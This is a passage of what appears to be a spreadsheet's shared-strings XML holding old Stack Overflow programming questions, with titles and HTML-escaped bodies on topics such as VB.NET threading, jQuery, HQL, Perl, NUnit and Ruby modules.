&lt;p&gt;I thought that a simple way to handle this would be to allow the user to drag one or more emails from Outlook (they are all using Outlook 2007 currently) into the window, allowing my app to extract the necessary information and send it to the backend system for storage.&lt;/p&gt;
&lt;p&gt;However, a few hours googling for information on this seem to indicate a shocking lack of information about this seemingly basic task. I would think that something like this would be useful in a lot of different settings, but all I've been able to find so far have been half-baked non-solutions. &lt;/p&gt;
&lt;p&gt;Does anyone have any advice on how to do this? Since I am just going to read the mails and not send anything out or do anything evil, it would be nice with a solution that didn't involve the hated security pop ups, but anything beats not being able to do it at all.&lt;/p&gt;
&lt;p&gt;Basically, if I could get a list of all the mail items that were selected, dragged and dropped from Outlook, I will be able to handle the rest myself!&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;Rune&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Threaded loading (waiting) screen</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a generic method to implement a wait screen during long operations. I have used threading a few times before, but I have the feeling that I implemented it either very poorly, or with way too much hassle (and copy/pasting - the horror!).&lt;/p&gt;
&lt;p&gt;I want to keep this as generic and simple as possible, so I won't have to implement loads of &lt;code&gt;BackgroundWorker&lt;/code&gt;s handling all kinds of crap, making things hard to maintain.&lt;/p&gt;
&lt;p&gt;Here's what I would like to do -- please note this might differ from what's actually possible/best practise/whatever -- using VB.NET, Framework 2.0 (so no anonymous methods):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  Private Sub HandleBtnClick(sender as Object, e as EventArgs) Handles Button.Click
      LoadingScreen.Show()
      'Do stuff here, this takes a while!'
      Dim Result as Object = DoSomethingTakingALongTime(SomeControl.SelectedObject)
      LoadingScreen.Hide()
      ProcessResults(Result)
  End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The application is now completely single-threaded, so everything runs on the GUI thread. I need to be able to access objects in &lt;code&gt;DoSomethingTakingALongTime()&lt;/code&gt; without getting cross-thread exceptions. The GUI thread waits for some method (which takes a long time) to complete, while the &lt;code&gt;LoadingScreen&lt;/code&gt; Form should stay responsive (it's animated/has a progressbar/etc.).&lt;/p&gt;
&lt;p&gt;Is this a doable/good approach or am I seeing this way too simplistic? What is the best practise concerning this matter? And most importantly: how could I implement such a system? As I already mentioned, I have very little experience with threading, so be gentle please :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript: how do I determine if a link targets the same domain as the page it resides on?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For the purposes of tracking non-HTML documents via google analytics, I need the mentioned algorithm. It should:&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;not hard-code the domain&lt;/li&gt;
&lt;li&gt;ignore the protocol (i.e. http/https)&lt;/li&gt;
&lt;li&gt;not worry about the presence/absence of "www" (any absolute links WILL prefix with "www" and all pages WILL be served via "www")&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;This is complicated by the fact that I need to access it via a function called from the IE-only 'attachEvent'.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt; Sorry, I've worded this question &lt;em&gt;really&lt;/em&gt; badly. The real problem is getting this to work via an event, since IE has its own made-up world of event handling. Take the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function add_event(obj) {
    if (obj.addEventListener)
        obj.addEventListener('click', track_file, true);
    else if (obj.attachEvent)
        obj.attachEvent("on" + 'click', track_file);
}
function track_file(obj) { }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems as if the "obj" in track_file is not the same across browsers - how can I refer to what was clicked in IE?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get dimensions of JPEG in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get at the image dimensions of a JPEG in C++. I'm looking for either a fairly simple way to do it, or a smallish library that provides that functionality. I'm working in C++ on OpenVMS, so any external libraries may have to be adapted to compile on our systems - so please don't post me links to big, closed source libraries!&lt;/p&gt;
&lt;p&gt;Has anyone come across anything that might do the trick, or understand the JPEG file format (I think I probably mean the JFIF file format here) to tell me how I might go about rolling my own solution?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Dom&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I change HTML attribute names with jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to change all the names of the attributes where &lt;code&gt;class="testingCase"&lt;/code&gt; throughout all my whole html document.&lt;/p&gt;
&lt;p&gt;e.g. Change:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;a class="testingCase" href="#" title="name of testing case"&amp;gt;Blabla&amp;lt;/a&amp;gt;&lt;/code&gt;
 &lt;br/&gt;&lt;code&gt;&amp;lt;a class="testingCase" href="#" title="name of another testing case"&amp;gt;Bloo&amp;lt;/a&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;To this: &lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;a class="testingCase" href="#" newTitleName="name of testing case"&amp;gt;Blabla&amp;lt;/a&amp;gt;&lt;/code&gt;
 &lt;br/&gt;&lt;code&gt;&amp;lt;a class="testingCase" href="#" newTitleName="name of another testing case"&amp;gt;Bloo&amp;lt;/a&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I was thinking of a find and replace but that seems a lot of code for something so easy. Is there a jQuery function for this or a simple method?&lt;/p&gt;
&lt;p&gt;Thank you,&lt;/p&gt;
&lt;p&gt;Ice&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using dates in the "where" clause of HQL query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the &lt;a href="http://www.sqlite.org/" rel="nofollow"&gt;SQLite&lt;/a&gt; database and have the following persistent class (simplified):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Project
{
    public virtual int Id { get; set; }
    public virtual DateTime StartDate { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is mapped to this table in the database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE projects (
    id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, 
    start_date DATETIME
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I need to write a query that will select all the projects that have started in a given month.&lt;/p&gt;
&lt;p&gt;In SQL I could use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT id FROM projects WHERE strftime('%m', start_date) = '12'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I dislike about this query is that it uses the database specific function "&lt;a href="http://www.sqlite.org/lang_datefunc.html" rel="nofollow"&gt;strftime&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;So the following HQL is dependent on the underlying database:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Get all projects that started in December (no matter which year)
var projects = session
    .CreateQuery(
        "from Project p " +
        "where strftime('%m', p.StartDate) = :month")
    .SetParameter("month", "12")
    .List&amp;lt;Project&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have also tried "from Project p where p.StartDate.Month = 12" but it didn't work.&lt;/p&gt;
&lt;p&gt;So using HQL or criteria API is it possible to write such a query in a database agnostic way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create multidimensional arrays in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a bit new to Perl, but here is what I want to do: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my @array2d;
while(&amp;lt;FILE&amp;gt;){
  push(@array2d[$i], $_);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It doesn't compile since &lt;code&gt;@array2d[$i]&lt;/code&gt; is not an array but a scalar value.&lt;/p&gt;
&lt;p&gt;How should I declare @array2d as an array of array?&lt;/p&gt;
&lt;p&gt;Of course, I have no idea of how many rows I have.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do i need to dispose of this Image instance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a simple Image Debugger Visualizer. Code is below. I'm not sure if i need to manually dispose of the Image instance? Because i'm making a windows Form window and the PictureBox inside that contains my dynamic image .. do i need to add some special code when the form is terminating, to dispose of this? &lt;/p&gt;
&lt;p&gt;here's the code..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System.Diagnostics;
using System.Drawing;
using System.Windows.Forms;
using Microsoft.VisualStudio.DebuggerVisualizers;
using DebuggerVisualizers;
[assembly: DebuggerVisualizer(
    typeof (ImageDebuggerVisualizer),
    typeof (VisualizerObjectSource),
    Target = typeof (Image),
    Description = "Image Visualizer")]
namespace DebuggerVisualizers
{
    public class ImageDebuggerVisualizer : DialogDebuggerVisualizer
    {
        protected override void Show(IDialogVisualizerService windowService, IVisualizerObjectProvider objectProvider)
        {
            Image image = (Image) objectProvider.GetObject();
            Form form = new Form
                           {
                               Text = ("Image Visualizer - " + image.HorizontalResolution + " " + image.VerticalResolution),
                               Width = image.Width,
                               Height = image.Height
                           };
            PictureBox pictureBox = new PictureBox {Image = image, SizeMode = PictureBoxSizeMode.AutoSize};
            form.Controls.Add(pictureBox);
            form.ShowDialog();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;thanks for any help :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why override operator()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the &lt;a href="http://www.boost.org/doc/html/signals.html"&gt;Boost Signals&lt;/a&gt; library, they are overloading the () operator.&lt;/p&gt;
&lt;p&gt;Is this a convention in C++? For callbacks, etc.?&lt;/p&gt;
&lt;p&gt;I have seen this in code of a co-worker (who happens to be a big Boost fan). Of all the Boost goodness out there, this has only led to confusion for me.&lt;/p&gt;
&lt;p&gt;Any insight as to the reason for this overload?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for network link speed determination algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the best way to interpret the standard (well, standardish) Ethernet PHY registers, to determine the speed that an Ethernet link is actually running at.  (e.g. 10/100/1000 and full/half-duplex)&lt;/p&gt;
&lt;p&gt;I daresay that this is to be found in the source of things like Linux, and I'm just off to look there now, but if anyone has a good reference I'd be interested.&lt;/p&gt;
&lt;p&gt;What I'm interested in is if it actually linked and what it linked at, rather than the vast sea of possibilities that each end has advertised at the outset.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>phpmyadmin - save file to disk</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;when i point my browser to &lt;code&gt;http://localhost/phpmyadmin&lt;/code&gt;, instead of showing me its front page, it comes up with save as dialog.&lt;/p&gt;
&lt;p&gt;I'm running:
Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server &lt;/p&gt;
&lt;p&gt;I've reinstalled both apache2 and php5.
After re-install i don't have httpd.conf file, how can i get it back? Is there a standard file which i can just copy into /etc/apache2?&lt;/p&gt;
&lt;p&gt;I did a locate httpd.conf and the only file i got was the empty file i have under /etc/apache2/ which i made.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>prolog recursively find largest node</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just a simple binary tree and i want to find the the largest node.
&lt;br&gt;example tree: t(t(t(nil,1,nil),2,t(nil,3,nil)),4,t(t(t(nil,8,nil),5,nil),6,t(nil,7,nil)))&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int L(t,max) {
if(t=null) return max;
if(max&amp;lt;t.root) max = t.root;
LN(t,max);
RN(t,max);
return max;
}
L(tree,tree.root);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I just cant wrap my head around applying it to prolog. Here i display each node. Which i get, but i dont understand how to save the max value and keep it recursively.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tree(nil).
tree(t(L,Root,R)) :- 
    tree(L),
    tree(R), 
    write(Root).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;edit: It checks all the leaf nodes, but ignores the t(nil,8,nil)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tree(nil,0).
tree(t(nil,Q,nil),Q) :- !.
tree(t(nil,Q,_),Q).
tree(t(_,Q,nil),Q).
tree(t(L,_,R),Max) :- 
    tree(L, LValue),
    tree(R, RValue), 
    max(LValue,RValue,Max).
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to get Url Hash (#) from server side</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know on client side (javascript) you can use windows.location.hash but could not find anyway to access from the server side.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL efficient "select id else insert" query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a MySQL table consisting of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE `url_list` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `crc32` int(10) unsigned NOT NULL,
  `url` varchar(512) NOT NULL,
  PRIMARY KEY  (`id`),
  KEY `crc32` (`crc32`)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When inserting data into a related table I need to lookup the primary key from this table, and using the crc32 really speeds that up whilst allowing a small index. The URLs do need to be unique, but I'd like to avoid having more index than actual data.&lt;/p&gt;
&lt;p&gt;If the value isn't present I need to insert it, but using structures such as &lt;code&gt;INSERT IGNORE&lt;/code&gt;, or ON &lt;code&gt;DUPLICATE KEY&lt;/code&gt; either requires me to put a unique on the huge varchar, or don't take advantage of my index.&lt;/p&gt;
&lt;p&gt;How can I "SELECT id else INSERT", whilst preserving the lookup speed for the 80-90% of hits that are already in the table?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Collection type for representing a hierarchial structure in .Net 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I been experimenting with the different methods for representing a hierarchical structures in memory that would allow for simple and efficient transversal both up and down to discover ancestor and descendant relationships.  Does anyone have any suggestions or examples of the options that I have?  Is there a collection type in .Net 3.5 that would help here?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How am I supposed to use the TortoiseSVN merge tool (TortoiseMerge)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How am I supposed to use merge with the latest version of Tortoise SVN? I'm an old &lt;a href="http://en.wikipedia.org/wiki/IBM_Rational_ClearCase" rel="nofollow"&gt;ClearCase&lt;/a&gt; guy, and I've never understood it. When I merge a branch back into the trunk, I just select range of revisions and then leave the version numbers blank and it starts spitting out all kinds of files that it's merging. It basically looks like it's adding and modifying everything.&lt;/p&gt;
&lt;p&gt;The funny thing is, when the merge is done, the only files that are actually touched are the files I updated, so it seems like everything worked fine (and after running a few tests, this seems to be the case). I just get scared by everything getting spit out of the merge log, it doesn't give me any indication of what's really happening.&lt;/p&gt;
&lt;p&gt;Should I put something in the version number box? TortoiseSVN seems to indicate that won't be necessary.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;So it seems like what I missing is the fact that the "Range of Revisions" should not be blank. To get functionality similar to what I was used to, I needed to put in the revision that created the branch-HEAD. So if revision 289 created my branch, then I needed to put 289-HEAD in the revisions to merge field and the results would match what I expected.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I reference a scalar in a hash reference in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question:&lt;/p&gt;
&lt;p&gt;How do I do this on one line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my $foo = $bar-&amp;gt;{baz};
fizz(\$foo);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried \$bar-&gt;{baz}, \${$bar-&gt;{baz}}, and numerous others.  Is this even possible?&lt;/p&gt;
&lt;p&gt;-fREW&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Ok, the hashref is coming from DBI and I am passing the scalar ref into template toolkit.  I guess now that I look more closely the issue is something to do with how TT does all of this.  Effectively I want to say:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$template-&amp;gt;process(\$row-&amp;gt;{body}, $data);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But TT doesn't work that way, TT takes a scalar ref and puts the data there, so I'd have to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$template-&amp;gt;process(\$row-&amp;gt;{body}, $shopdata, \$row-&amp;gt;{data});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyway, thanks for the help.  I'll at least only have one reference instead of two.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between the KeyCode and KeyData properties on the .NET WinForms key event argument objects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The two key event argument classes &lt;code&gt;KeyEventArgs&lt;/code&gt; and &lt;code&gt;PreviewKeyDownEventArgs&lt;/code&gt; each have two properties, &lt;code&gt;KeyCode&lt;/code&gt; and &lt;code&gt;KeyData&lt;/code&gt;, which are both of the enumeration type Keys.&lt;/p&gt;
&lt;p&gt;What is the difference between these two properties? Do the values in them ever differ from each other?  If so, when and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compare equality between two objects in NUnit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to assert that one object is "equal" to another object. &lt;/p&gt;
&lt;p&gt;The objects are just instances of a class with a bunch of public properties. Is there an easy way to have NUnit assert equality based on the properties?&lt;/p&gt;
&lt;p&gt;This is my current solution but I think there may be something better:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Assert.AreEqual(LeftObject.Property1, RightObject.Property1)
Assert.AreEqual(LeftObject.Property2, RightObject.Property2)
Assert.AreEqual(LeftObject.Property3, RightObject.Property3)
...
Assert.AreEqual(LeftObject.PropertyN, RightObject.PropertyN)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I'm going for would be in the same spirit as the CollectionEquivalentConstraint wherein NUnit verifies that the contents of two collections are identical.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preparing a development tools machine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a small project with a few friends and need to set up a server to run our tools. I looked around at hosted solutions like &lt;a href="http://unfuddle.com/" rel="nofollow"&gt;Unfuddle&lt;/a&gt; but they don't provide a CI server.&lt;/p&gt;
&lt;p&gt;I am now considering buying a &lt;a href="http://www.linode.com/" rel="nofollow"&gt;Linode&lt;/a&gt; and running the following on it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Mail              : &lt;a href="http://james.apache.org/" rel="nofollow"&gt;Apache JAMES&lt;/a&gt;   &lt;/li&gt;
&lt;li&gt;CI                : &lt;a href="http://hudson-ci.org/" rel="nofollow"&gt;Hudson&lt;/a&gt;   &lt;/li&gt;
&lt;li&gt;Wiki/Tracker      : &lt;a href="http://trac.edgewall.org/" rel="nofollow"&gt;Trac&lt;/a&gt;   &lt;/li&gt;
&lt;li&gt;Project Management: &lt;a href="http://studios.thoughtworks.com/mingle-agile-project-management" rel="nofollow"&gt;Mingle&lt;/a&gt;   &lt;/li&gt;
&lt;li&gt;VCS               : &lt;a href="http://subversion.tigris.org/" rel="nofollow"&gt;SVN&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am a Linux server newbie, so does anyone have any writeups, advice etc about this? I am aware of &lt;a href="http://buildix.thoughtworks.com/" rel="nofollow"&gt;Buildix&lt;/a&gt;, but they don't provide the combination I need. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create a DSL vs. Embed an Existing Language</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This often comes up: your application has gotten extensive enough that it's time to add some programmability into it to make it flexible. One example might be a finance application - you want to add a formula editor so that you can create your own custom formulas without having to re-compile the code.&lt;/p&gt;
&lt;p&gt;You have to make a choice: do you create your own tokenizer, parser, and interpreter/compiler chain, something which might take a long time and might be done incorrectly? Or do you just embed another scripting language, which has the problem that it'll likely bloat your code and expose your app to security vulnerabilities.&lt;/p&gt;
&lt;p&gt;How would you balance the trade-offs and make this decision?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running numpy from cygwin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running a windows machine have installed Python 2.5.  I also used the windows installer to install NumPy. &lt;/p&gt;
&lt;p&gt;This all works great when I run the Python (command line) tool that comes with Python.&lt;/p&gt;
&lt;p&gt;However, if I run cygwin and then run Python from within, it cannot find the numpy package.&lt;/p&gt;
&lt;p&gt;What environment variable do I need to set? What value should it be set to?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>ApplicationVerifier is not detecting handle leaks, what do I do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I did select the executable correctly, because I can get it to respond to certain things I do.  But I can't get ApplicationVerifier to properly detect a handle leak.&lt;/p&gt;
&lt;p&gt;Here is an example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
    HANDLE hFile = CreateFile(_T("C:\\test.txt"), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ApplicationVerifier doesn't detect this.&lt;/p&gt;
&lt;p&gt;What can I do to detect the above problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is It Possible to Use a String as an Index?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In other languages you can use strings as keys -&lt;/p&gt;
&lt;p&gt;PHP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$array['string'] = 50; 
$array['anotherstring'] = 150;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible in VBA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to initialise a New System.Collections.Generic.Dictionary with String key/value pairs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to create and initialise a &lt;a href="http://msdn.microsoft.com/en-us/library/6918612z(VS.80).aspx"&gt;&lt;code&gt;System.Collections.Generic.Dictionary&lt;/code&gt;&lt;/a&gt; object with String key/value pairs in one statement?&lt;/p&gt;
&lt;p&gt;I'm thinking along the lines of the constructor for an array of Strings..&lt;/p&gt;
&lt;p&gt;e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private mStringArray As String() = {"String1", "String2", "etc"}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In case this is turns out to be a &lt;a href="http://en.wikipedia.org/wiki/Syntactic_sugar"&gt;syntactic sugar&lt;/a&gt; kind of thing, I'd prefer an answer that I can use in .Net 2.0 (Visual Studio 2005), and Visual Basic - though I'm curious if it's possible at all so don't let that put you off ;o)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to close a system dialog on a BlackBerry?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a BlackBerry app running in the background that needs to know when a "Missed call" system dialog is brought up by the system, and programmatically close it without user intervention. How can I do that?&lt;/p&gt;
&lt;p&gt;I could actually almost know when the dialog is brought up, i.e. a little later I programmatically end the call...but how can I get a reference to the dialog, and close it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Object-oriented or sequential?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm refactoring a 500-lines of C++ code in main() for solving a differential equation.  I'd like to encapsulate the big ideas of our solver into smaller functions (i.e. "SolvePotential(...)" instead of 50 lines of numerics code). &lt;/p&gt;
&lt;p&gt;Should I code this sequentially with a bunch of functions taking &lt;strong&gt;very long&lt;/strong&gt; parameters lists, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int main(int *argc, void **argv){
   interpolate(x,y,z, x_interp, y_interp, z_interp, potential, &amp;amp;newPotential);
   compute_flux(x,y,z, &amp;amp;flux)
   compute_energy(x,y,z, &amp;amp;eng)
   ...
   // 10 other high-level function calls with long parameter lists
   ...
   return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or should I create a "SolvePotential" class that would be called like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int main(int *argc, void **argv){
   potential = SolvePotential(nx, ny, nz, nOrder);
   potential.solve();
   return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where I would define functions in SolvePotential that uses member variables rather than long parameter lists, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SolverPotential::solve(){
  SolvePotential::interpolate()
  SolverPotential::compute_flux()
  SolverPotential::compute_energy()
  // ... 
  //  10 other high-level function calls with NO parameter lists (just use private member variables)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In either case, I doubt I'll re-use the code very much... really, I'm just refactoring to help with code clarity down the road.&lt;/p&gt;
&lt;p&gt;Maybe this is like arguing "Is it '12' or 'one dozen'?", but what do you think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get real image width and height with JavaScript in Safari/Chrome?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a jQuery plugin.&lt;/p&gt;
&lt;p&gt;How do I get real image width and height with Javascript in Safari?&lt;/p&gt;
&lt;p&gt;Following works with Firefox 3, IE7 and Opera 9:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var pic = $("img")
// need to remove these in of case img-element has set width and height
pic.removeAttr("width"); 
pic.removeAttr("height");
var pic_real_width = pic.width();
var pic_real_height = pic.height();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But in Webkit browsers like Safari and Google Chrome values are 0...&lt;/p&gt;
&lt;p&gt;Doing this on server side is not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BLAS Library Benchmark</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a benchmark that compares the different BLAS (Basic Linear Algebra Subprograms) libraries? I am especially interested in sparse matrix multiplication for single- and multi-core systems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net sql timeout when not using sql</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Im in the process of learning asp.net 3.5, currently on webparts and co.&lt;/p&gt;
&lt;p&gt;Ive started a new project for webparts, not using a database with it, but when i go to view the website (dev server), i get an sql timeout??&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A network-related or instance-specific
  error occurred while establishing a
  connection to SQL Server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Just to be clear, there is no mention of sql anywhere in the project.&lt;br /&gt;
Should i just start again?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;br /&gt;
May be relevant&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;(provider: Shared Memory Provider, error: 40 - Could not open a connection to SQL Server)&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Does anyone know where there is a recipe for serializing data and preserving its order in the output?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with a set of data that I have converted to a list of dictionaries&lt;/p&gt;
&lt;p&gt;For example one item in my list is &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{'reportDate': u'R20070501', 'idnum': u'1078099', 'columnLabel': u'2005',
 'actionDate': u'C20070627', 'data': u'76,000', 'rowLabel': u'Sales of Bananas'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Per request &lt;/p&gt;
&lt;p&gt;The second item in my list could be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; {'reportDate': u'R20070501', 'idnum': u'1078099', 'columnLabel': u'2006',
 'actionDate': u'C20070627', 'data': u'86,000', 'rowLabel': u'Sales of Bananas'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The third item could be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; {'reportDate': u'R20070501', 'idnum': u'1078100', 'columnLabel': u'Full Year 2005',
 'actionDate': u'C20070627', 'data': u'116,000', 'rowLabel': u'Sales of Cherries'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The fourth item could be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; {'reportDate': u'R20070501', 'idnum': u'1078100', 'columnLabel': u'Full Year 2006',
 'actionDate': u'C20070627', 'data': u'76,000', 'rowLabel': u'Sales of Sales of Cherries'}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason I need to pickle this is because I need to find out all of the ways the columns were labeled before I consolidate the results and put them into a database.  The first and second items will be one row in the results, the third and fourth would be the next line in the results (after someone decides what the uniform column header label should be)&lt;/p&gt;
&lt;p&gt;I tested pickle and was able to save and retrieve my data.  However, I need to be able to preserve the order in the output.  One idea I have is to add another key that would be a counter so I could retrieve my data and then sort by the counter.  Is there a better way?&lt;/p&gt;
&lt;p&gt;I don't want to put this into a database because it is not permanent.  &lt;/p&gt;
&lt;p&gt;I marked an answer down below. It is not what I am getting, so I need to figure out if the problem is somewhere else in my code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Private module methods in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a two part question&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Best-Practice&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I have an algorithm that performs some operation on a data structure using the public interface&lt;/li&gt;
&lt;li&gt;It is currently a module with numerous static methods, all private except for the one public interface method.&lt;/li&gt;
&lt;li&gt;There is one instance variable that needs to be shared among all the methods.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These are the options I can see, which is the best?:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Module&lt;/strong&gt; with static ('module' in ruby) methods &lt;/li&gt;
